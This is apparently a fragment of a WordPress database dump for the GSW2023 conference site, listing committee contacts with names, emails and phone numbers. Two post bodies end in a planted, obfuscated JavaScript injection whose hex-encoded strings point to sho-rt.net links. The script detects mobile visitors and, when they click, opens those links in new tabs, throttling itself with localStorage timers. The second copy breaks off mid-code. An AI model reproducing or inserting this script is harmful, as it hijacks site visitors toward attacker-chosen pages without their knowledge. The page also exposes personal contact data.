href=\"mailte:+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-autosave-v1','','','2023-06-28 10:19:29','2023-06-28 10:19:29','',4849,'https://gsw2023.com/?p=4853',0,'revision','',0),
(4854,4,'2023-06-27 07:16:01','2023-06-27 07:16:01','[vc_row][vc_column][dt_team_masonry][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66, 75\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function 